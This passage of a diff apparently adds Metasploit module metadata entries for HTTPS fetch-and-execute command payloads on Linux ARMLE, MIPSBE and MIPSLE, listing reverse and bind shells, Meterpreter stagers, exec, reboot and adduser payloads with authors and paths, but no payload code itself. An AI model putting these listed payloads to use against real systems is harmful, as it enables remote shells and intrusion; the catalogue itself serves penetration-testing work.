+    "ref_name": "cmd/linux/https/armle/adduser",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/adduser",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armle/exec": {
+    "name": "HTTPS Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/https/armle/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Jonathan Salwan"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nExecute an arbitrary command",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armle/meterpreter/bind_tcp": {
+    "name": "HTTPS Fetch, Bind TCP Stager",
+    "fullname": "payload/cmd/linux/https/armle/meterpreter/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "nemo <nemo@felinemenace.org>"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nListen for a connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/meterpreter/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/meterpreter/bind_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/meterpreter",
+    "stager_refname": "linux/armle/bind_tcp"
+  },
+  "payload_cmd/linux/https/armle/meterpreter/reverse_tcp": {
+    "name": "HTTPS Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/https/armle/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "nemo <nemo@felinemenace.org>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/meterpreter",
+    "stager_refname": "linux/armle/reverse_tcp"
+  },
+  "payload_cmd/linux/https/armle/meterpreter_reverse_http": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armle/meterpreter_reverse_https": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armle/meterpreter_reverse_tcp": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armle/shell/bind_tcp": {
+    "name": "HTTPS Fetch, Linux dup2 Command Shell, Bind TCP Stager",
+    "fullname": "payload/cmd/linux/https/armle/shell/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "nemo <nemo@felinemenace.org>"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nListen for a connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/shell/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/shell/bind_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/shell",
+    "stager_refname": "linux/armle/bind_tcp"
+  },
+  "payload_cmd/linux/https/armle/shell/reverse_tcp": {
+    "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/https/armle/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "nemo <nemo@felinemenace.org>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/shell",
+    "stager_refname": "linux/armle/reverse_tcp"
+  },
+  "payload_cmd/linux/https/armle/shell_bind_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/https/armle/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "civ",
+      "hal"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect to target and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/armle/shell_reverse_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/https/armle/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "civ"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/armle/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/armle",
+    "adapted_refname": "linux/armle/shell_reverse_tcp",
+    "staged": false
+  },
  "payload_cmd/linux/https/mips64/meterpreter_reverse_http": {
    "name": "HTTPS Fetch",
    "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_http",
@@ -201212,6 +204833,1136 @@
    "adapted_refname": "linux/mips64/meterpreter_reverse_tcp",
    "staged": false
  },
+  "payload_cmd/linux/https/mipsbe/exec": {
+    "name": "HTTPS Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/https/mipsbe/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "entropy <entropy@phiral.net>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n                A very small shellcode for executing commands.\n                This module is sometimes helpful for testing purposes.",
+    "references": [
+      "EDB-17940"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsbe/meterpreter/reverse_tcp": {
+    "name": "HTTPS Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsbe/meterpreter",
+    "stager_refname": "linux/mipsbe/reverse_tcp"
+  },
+  "payload_cmd/linux/https/mipsbe/meterpreter_reverse_http": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsbe/meterpreter_reverse_https": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsbe/meterpreter_reverse_tcp": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsbe/reboot": {
+    "name": "HTTPS Fetch, Linux Reboot",
+    "fullname": "payload/cmd/linux/https/mipsbe/reboot",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "rigan - <imrigan@gmail.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n            A very small shellcode for rebooting the system.\n            This payload is sometimes helpful for testing purposes or executing\n            other payloads that rely on initial startup procedures.",
+    "references": [
+      "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/reboot",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/reboot",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsbe/shell/reverse_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/https/mipsbe/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsbe/shell",
+    "stager_refname": "linux/mipsbe/reverse_tcp"
+  },
+  "payload_cmd/linux/https/mipsbe/shell_bind_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/https/mipsbe/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "scut",
+      "vaicebine",
+      "Vlatko Kosturjak",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsbe/shell_reverse_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/https/mipsbe/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "rigan <imrigan@gmail.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+      "EDB-18226"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsbe/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsle/exec": {
+    "name": "HTTPS Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/https/mipsle/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "entropy <entropy@phiral.net>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n        A very small shellcode for executing commands.\n        This module is sometimes helpful for testing purposes as well as\n        on targets with extremely limited buffer space.",
+    "references": [
+      "EDB-17940"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsle/meterpreter/reverse_tcp": {
+    "name": "HTTPS Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsle/meterpreter",
+    "stager_refname": "linux/mipsle/reverse_tcp"
+  },
+  "payload_cmd/linux/https/mipsle/meterpreter_reverse_http": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsle/meterpreter_reverse_https": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsle/meterpreter_reverse_tcp": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
